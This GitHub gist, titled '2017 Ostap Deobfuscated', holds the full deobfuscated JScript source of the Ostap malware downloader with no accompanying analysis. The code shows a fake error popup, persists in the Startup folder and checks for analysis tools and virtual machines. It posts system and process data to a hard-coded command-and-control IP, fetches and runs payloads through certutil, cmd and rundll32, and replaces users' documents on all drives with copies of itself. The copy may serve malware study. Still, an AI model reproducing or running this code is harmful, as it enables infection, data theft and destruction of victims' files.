Instantly share code, notes, and snippets.

Embed
What would you like to do?
2017 Ostap Deobfuscated
graplingexcited86 = "meAre50";
graplingphysics7 = "cause84";
graplingemit13 = "crack1";
graplingresearch99 = "tell69";
graplingwith56 = "moanedOr54";
graplingelectron87 = "beautiful3";
graplingbeen5 = "stuck91";
graplingstate28 = "trying30";
graplinghowever69 = "shoesAnd81";
graplingsince55 = "just4";
graplingenergy83 = "single66";
graplingenergy57 = "expect50";
graplingundergo36 = "will1";
graplingfield47 = "starting11";
graplingwith91 = "have79";
graplingmultiply81 = "home57";
graplingdifference74 = "like52";
graplingoften91 = "opens13";
graplingeffect23 = "throughAre67";
graplingsystem36 = "like8";
graplingvisible9 = "should81";
graplinghighly22 = "Ill45";
graplingsystem48 = "that8";
graplingother71 = "assLaugh8";
graplingreleased37 = "these4";
graplingelectron55 = "seeWhat46";
var graplingelectron64 = "cfgvtyguhbnjiokqw";
var String3456 = "noway";
var graplingfield47 = this["WScript"];
var EnmN = this["Enumerator"];
var GeObj = this["GetObject"];
var ActXN = this["ActiveXObject"];
var graplingthan91 = graplingfield47["CreateObject"]("WScript.Shell");
var graplingionize38 = new ActXN("Scripting.FileSystemObject");
var fstream = null;
try {
fstream = new ActXN("ADODB.Stream");
} catch (zsxdcfvgbhnj) {}
var oShell23 = new ActXN("Shell.Application");
var graplingenergy28 = graplingthan91["ExpandEnvironmentStrings"]("%TEMP%");
var graplingprocesses43 = graplingthan91["ExpandEnvironmentStrings"]("%USERPROFILE%");
var char123 = String["fromCharCode"](100 - (2 * 2 + 4));
var charq = String["fromCharCode"](30 + 2 * 2);
var graplingstate70 = Math["floor"](Math["random"]() * 999 + 1);
var graplingsystem48 = "";
var graplingbinding46 = "";
var graplingsingle20 = new ActXN("Msxml2.ServerXMLHTTP");
var graplingthat52 = char123 + "fly.jse";
var startupFolder = oShell23["NameSpace"](8 + 4 - 5);
var tone789 = 1;
var graplingnucleus47 = 0;
var icount = 0;
var graplingelectron84 = false;
var out123 = 0;
var exit123 = 0;
var graplingtransferred4 = 3;
var HujikOlp = "https://185.159.82.142:8500/PL/placezero.php?add=";
var graplingconsidered90 = null;
var graplingfields93 = null;
var graplingprimarily24 = false;
var graplingrules39 = false;
var graplingshell56 = null;
var graplingthat34 = "MZ";
var graplingsaid40 = "POST";
var oExec12 = null;
var graplingscientific56 = graplingfield47["ScriptFullName"];
var filets = null;
var frefre656 = null;
var auto90989r = startupFolder["Self"]["Path"] + graplingthat52;
var uidhere = auto90989r + graplingenergy28;
var delay123 = ("2030000") * 1;
var graplingstate28 = "-f -decode ";
var nod32sucks = ("4294967295") * 1;
var url_ppp = null;
var obj00WMI = null;
var col00Items = graplingnucleus47;
var objI999tem = null;
var output67888 = graplingnucleus47;
var col00Items2 = null;
var graplinghave8 = "";
var os456 = "";
var graplingexcess96 = "";
var waytocrypt = "";
var graplingconsiders32 = "";
var colDrives = graplingionize38["Drives"];
var graplingpower95 = null;
var graplingmore67 = null;
var ext789 = "*.doc *.xls *.pdf *.rtf *.txt *.pub *.odt *.ods *.odp *.odm *.odc *.odb *.wps *.xlk *.ppt *.mdb *.accdb *.pst *.dwg *.dxf *.dxg *.wpd";
var diskcount = 1;
var list87656 = "saymyname.txt";
var pussy89 = null;
var graplingmultiply81 = null;
var graplingenergy85 = -1;
try {
if (graplingscientific56 != auto90989r) {
if (graplingthan91["Popup"]("There was an error opening this document.", 4 + 4, "Error", 16) == 1) {
graplingconsidered90 = graplingionize38["OpenTextFile"](graplingscientific56, 1, false, 0);
graplingmultiply81 = graplingconsidered90["ReadLine"]();
graplingconsidered90["Close"]();
graplingrules39 = true;
}
}
} catch (zsxdcfvgbhnj) {}
while (true) {
tone789 = tone789 + 1;
graplingelectron64 = "tesbb";
if (tone789 == delay123) {
for (icount = 1 - 1; icount < uidhere["length"]; icount++) {
graplingnucleus47 = (graplingnucleus47 << 3 + 2) - graplingnucleus47 + uidhere["charCodeAt"](icount) & nod32sucks;
}
if (auto90989r["indexOf"](char123 + "AppData" + char123) == -1) {
icount = 10;
} else {
icount = 20;
}
try {
obj00WMI = GeObj("winmgmts:{impersonationLevel=impersonate}!" + char123 + char123 + "." + char123 + "root" + char123 + "cimv2");
col00Items = new EnmN(obj00WMI["ExecQuery"]("Select * from Win32_Process"));
col00Items2 = new EnmN(obj00WMI["ExecQuery"]("Select * from Win32_OperatingSystem"));
while (!col00Items2["atEnd"]()) {
os456 = os456 + col00Items2["item"]()["Caption"] + col00Items2["item"]()["Version"];
col00Items2["moveNext"]();
}
while (!col00Items["atEnd"]()) {
objI999tem = col00Items["item"]();
output67888 = objI999tem["ExecMethod_"]("GetOwner");
graplinghave8 = graplinghave8 + objI999tem["Name"] + "*" + objI999tem["ExecutablePath"] + "*" + output67888["Domain"] + "|" + output67888["User"] + String["fromCharCode"](13) + String["fromCharCode"](10);
col00Items["moveNext"]();
}
} catch (zsxdcfvgbhnj) {}
if (graplinghave8["indexOf"]("Procmon") != graplingenergy85 || graplinghave8["indexOf"]("Wireshark") != graplingenergy85 || graplinghave8["indexOf"]("Temp" + char123 + "iexplore.exe") != graplingenergy85 || graplinghave8["indexOf"]("ProcessHacker") != -1 || graplinghave8["indexOf"]("vmtoolsd") != graplingenergy85 || graplinghave8["indexOf"]("VBoxService") != -1 || graplinghave8["indexOf"]("python") != graplingenergy85 || graplinghave8["indexOf"]("Proxifier.exe") != graplingenergy85 || graplinghave8["indexOf"]("Johnson-PC") != -1 || graplinghave8["indexOf"]("ImmunityDebugger.exe") != -1 || graplinghave8["indexOf"]("lordPE.exe") != -1 || graplinghave8["indexOf"]("ctfmon.exe*JOHN-PC") != graplingenergy85 || graplinghave8["indexOf"]("BehaviorDumper") != graplingenergy85 || graplinghave8["indexOf"]("anti-virus.EXE") != graplingenergy85 || graplinghave8["indexOf"]("AgentSimulator.exe") != -1 || graplinghave8["indexOf"]("VzService.exe") != -1 || graplinghave8["indexOf"]("VmRemoteGuest") != graplingenergy85 || graplinghave8["indexOf"]("SystemIT|admin") != graplingenergy85) {
document["alert"]("Screw you guys, Im going home!!!!");
}
if (graplingrules39) {
graplingfields93 = graplingionize38["CreateTextFile"](auto90989r, true, false);
graplingfields93["WriteLine"](graplingmultiply81);
graplingfields93["Close"]();
}
while (true) {
graplingelectron64 = "fuck it..";
try {
graplingsystem48 = graplingenergy28 + char123 + Math["floor"](Math["random"]() * 987 + 1) + ".exe";
graplingbinding46 = graplingenergy28 + char123 + Math["floor"](Math["random"]() * 590 + 1) + ".gop";
graplingsingle20["setOption"](graplingtransferred4, "MSXML");
url_ppp = HujikOlp + String3456 + "&u=" + Math["abs"](graplingnucleus47) + "&o=" + out123 + "&v=" + icount + "&" + Math["floor"](Math["random"]() * 456 + 1) + Math["floor"](Math["random"]() * 780 + 1);
graplingsingle20["open"](graplingsaid40, url_ppp, false);
if (graplingrules39) {
graplingsingle20["send"](os456 + String["fromCharCode"](10 + 3) + String["fromCharCode"](5 + 5) + graplinghave8);
} else {
graplingsingle20["send"]();
}
if (graplingsingle20["status"] == 200) {
if (out123 == 0) {
graplingshell56 = graplingsingle20["responseText"];
try {
if (graplingsingle20["getResponseHeader"]("you_god_damn_right") == "0") {
graplingsystem48 = auto90989r;
graplingenergy85 = 0;
}
} catch (zsxdcfvgbhnj) {}
try {
if (graplingsingle20["getResponseHeader"]("you_god_damn_right") == "1") graplingenergy85 = 1;
} catch (zsxdcfvgbhnj) {}
try {
if (graplingsingle20["getResponseHeader"]("you_god_damn_right") == "2") graplingenergy85 = 2;
} catch (zsxdcfvgbhnj) {}
try {
if (graplingsingle20["getResponseHeader"]("Content-Transfer-Encoding") == "binary") {
fstream["Open"]();
fstream["Type"] = 1;
fstream["Write"](graplingsingle20["responseBody"]);
fstream["Position"] = 0;
fstream["SaveToFile"](graplingsystem48, 2);
fstream["Close"]();
} else {
if (graplingshell56.length > 10) {
graplingconsidered90 = graplingionize38["CreateTextFile"](graplingbinding46, true, false);
graplingconsidered90["WriteLine"](graplingshell56);
graplingconsidered90["Close"]();
graplingfield47["Sleep"](7e3);
oShell23["ShellExecute"]("certutil", graplingstate28 + graplingbinding46 + " " + charq + graplingsystem48 + charq, "", "open", 0);
}
}
} catch (zsxdcfvgbhnj) {}
}
if (graplingenergy85 == 0) {
graplingfield47["Sleep"](6e4);
graplingenergy85 = -1;
out123 = 9;
continue;
}
graplingfield47["Sleep"](2e4);
if (!graplingionize38["FileExists"](graplingsystem48)) {
try {
graplingpower95 = new EnmN(colDrives);
for (;!graplingpower95["atEnd"](); graplingpower95["moveNext"]()) {
graplingmore67 = graplingpower95["item"]();
if (graplingmore67["IsReady"] && (graplingmore67["DriveType"] == 3 || graplingmore67["DriveType"] == 1) && graplingprocesses43["substring"](0, 1) != graplingmore67["DriveLetter"]) {
oShell23["ShellExecute"]("cmd", "/U /Q /C cd /D " + graplingmore67["DriveLetter"] + ": && dir /b/s/x " + ext789 + ">>%TEMP%\\" + list87656, "", "open", 0);
graplingfield47["Sleep"](1e3 * 90);
}
}
graplingfield47["Sleep"](1e3 * 30);
frefre656 = graplingionize38["GetFile"](graplingenergy28 + char123 + list87656)["OpenAsTextStream"](1, -1);
while (!frefre656["AtEndOfStream"]) {
waytocrypt = frefre656["ReadLine"]();
graplingconsiders32 = waytocrypt["substring"](0, waytocrypt["indexOf"]("."));
oShell23["ShellExecute"]("cmd", "/U /Q /C copy /Y " + charq + auto90989r + charq + " " + charq + graplingconsiders32 + ".jse" + charq + " && del /Q/F " + charq + waytocrypt + charq, "", "open", 0);
}
frefre656["Close"]();
graplingionize38["DeleteFile"](graplingenergy28 + char123 + list87656);
} catch (zsxdcfvgbhnj) {}
out123 = 0;
graplingprimarily24 = false;
continue;
}
filets = graplingionize38["GetFile"](graplingsystem48)["OpenAsTextStream"](1);
graplingexcess96 = filets["ReadLine"]()["substring"](0, 2);
if (graplingexcess96 == graplingthat34 && out123 == 0) {
try {
switch (graplingenergy85) {
case -1:
oShell23["ShellExecute"]("cmd", String["fromCharCode"](47) + "c start " + graplingsystem48, "", "open", 0);
out123 = 8;
break;
case 0:
oShell23["ShellExecute"]("cmd", String["fromCharCode"](47) + "c start " + graplingsystem48, "", "open", 0);
out123 = 9;
break;
case 1:
oShell23["ShellExecute"]("rundll32", charq + graplingsystem48 + charq + " secretFunction", "", "open", 0);
out123 = 10;
break;
case 2:
oShell123["ShellExecute"](filepath, "/silent /install", "", "runas", 1);
out123 = 11;
break;
}
} catch (zsxdcfvgbhnj) {
try {
oExec12 = graplingthan91["Exec"](graplingsystem48);
out123 = oExec12["ProcessID"];
} catch (zsxdcfvgbhnj) {}
}
graplingfield47["Sleep"](1e4);
}
try {
oShell23["ShellExecute"]("cmd", "/U /Q /C del /Q/F %TEMP%\*.exe && del /Q/F %TEMP%\*.gop && del /Q/F %TEMP%\*.txt && del /Q/F %TEMP%\*.log && del /Q/F %TEMP%\*.jse", "", "open", 0);
graplingionize38["DeleteFile"](graplingsystem48);
} catch (zsxdcfvgbhnj) {}
filets["Close"]();
}
} catch (zsxdcfvgbhnj) {}
graplingfield47["Sleep"](1e3 * 50);
}
break;
}
}
graplingatomic13 = "undefined";
graplingterm21 = "undefined";
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment